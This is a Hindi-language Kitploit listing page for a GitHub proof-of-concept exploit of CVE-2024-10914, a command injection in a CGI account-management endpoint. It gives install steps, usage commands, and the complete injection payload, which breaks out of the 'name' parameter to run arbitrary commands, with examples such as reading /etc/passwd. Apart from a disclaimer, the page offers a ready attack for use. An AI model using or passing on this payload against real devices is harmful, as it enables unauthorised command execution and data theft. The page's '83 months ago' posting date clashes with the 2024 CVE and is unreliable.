Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10914__POC — CVE-2024-10914 का शोषण करने के लिए PoC | Kitploit
उपकरण/GitHubGitHub/0xss3k/cve-2024-10914__poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHub0xss3k/cve-2024-10914__poc

CVE-2024-10914__POC

CVE-2024-10914 का शोषण करने के लिए PoC

रिपॉजिटरी देखें
83 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-10914 - प्रूफ ऑफ कॉन्सेप्ट

एंडपॉइंट /cgi-bin/account_mgr.cgi पर कमांड इंजेक्शन भेद्यता के लिए एक्सप्लॉइट। यह भेद्यता अनसैनिटाइज़्ड पैरामीटरों के जरिए प्रभावित सिस्टम पर मनमाने कमांड निष्पादित करने की अनुमति देती है।

भेद्यता का विवरण

CVE-2024-10914 एक कमांड इंजेक्शन भेद्यता है जो CGI वेब इंटरफ़ेस वाले उपकरणों को प्रभावित करती है। कमजोर एप्लिकेशन cgi_user_add अनुरोध में name पैरामीटर को सही ढंग से मान्य नहीं करता है, जिससे हमलावर सिस्टम कमांड इंजेक्ट कर सकता है जो एप्लिकेशन के विशेषाधिकारों के साथ निष्पादित होंगे।

आवश्यकताएँ

  • Python 3.7+
  • requests library

स्थापना

रिपॉजिटरी को क्लोन करें और निर्भरताएँ स्थापित करें:

git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt

या मैन्युअल रूप से स्थापित करें:

pip install requests

उपयोग

स्क्रिप्ट दो तर्क प्रदान करती है:

python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>

पैरामीटर

  • -u, --url (आवश्यक): लक्ष्य का URL (उदाहरण: http://192.168.1.1)
  • -c, --command (वैकल्पिक): निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id)

उदाहरण

id कमांड निष्पादित करें:

python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1

अनुकूलित कमांड निष्पादित करें:

python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"

फ़ाइलें सूचीबद्ध करें:

python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"

तकनीकी कार्यप्रणाली

एक्सप्लॉइट निम्नलिखित पेलोड के साथ कमजोर एंडपॉइंट पर एक GET अनुरोध भेजता है:

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "

खाली स्ट्रिंग को उद्धरण चिह्नों से बंद किया जाता है और वांछित कमांड इंजेक्ट किया जाता है, जो सर्वर के संदर्भ में निष्पादित होता है।

प्रतिक्रिया

स्क्रिप्ट प्रदर्शित करेगी:

  • कनेक्शन की स्थिति
  • भेजा गया पेलोड
  • HTTP स्थिति कोड
  • सर्वर का पूर्ण प्रतिक्रिया

कानूनी चेतावनी

यह कोड केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग केवल उन प्रणालियों पर किया जाना चाहिए जिनके लिए आपके पास स्पष्ट प्राधिकरण है। इस एक्सप्लॉइट के अनधिकृत उपयोग से स्थानीय कानूनों का उल्लंघन हो सकता है और यह अपराध हो सकता है। लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है।

संदर्भ

  • CVE-2024-10914
  • CVSS Score: TBD

लेखक

SS3K

लाइसेंस

निर्दिष्ट नहीं है

टूल डाउनलोड करें